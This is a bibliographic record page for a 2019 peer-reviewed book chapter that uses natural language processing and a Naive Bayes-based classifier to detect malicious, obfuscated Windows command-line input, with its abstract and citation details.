Detecting Malicious Windows Commands Using Natural Language Processing Techniques

Capítulo de livro Revisado por pares

Detecting Malicious Windows Commands Using Natural Language Processing Techniques

2019; Springer Science+Business Media; Linguagem: Inglês

10.1007/978-3-030-12942-2_13

ISSN

1611-3349

Autores

Muhammd Mudassar Yamin, Basel Katt,

Tópico(s)

Network Security and Intrusion Detection

Resumo

Windows command line arguments are used in administration of operating system through a CLI (command line interface). This command line interface gives access to multiple powerful system administration tools like PowerShell and WMIC. In an ideal scenario, access to CLI is restricted for malicious users, and the command line inputs are logged for forensic investigation. However, cyber criminals are implementing innovative command line obfuscation techniques to bypass those access restrictions and compromise system security. Traditional pattern matching techniques on obfuscated command line arguments are not suitable as detection mechanism due to the large search space presented in obfuscated command. In this work we used artificial intelligence driven natural language processing techniques for the classification of Windows command line as malicious or not. We implemented Multinomial Naive Bayes algorithm with neural network and trained it over a data set of malicious command line arguments. We evaluated the trained classifier in a real environment with both normal and malicious obfuscated command line argument and found our technique very effective in classifying malicious command line arguments with respect to false positives and performance.

Ver no editor

Altmetric

PlumX

Entrar

Lembrar minha senha

Receber meu e-mail de confirmação

Detecting Malicious Windows Commands Using Natural Language Processing Techniques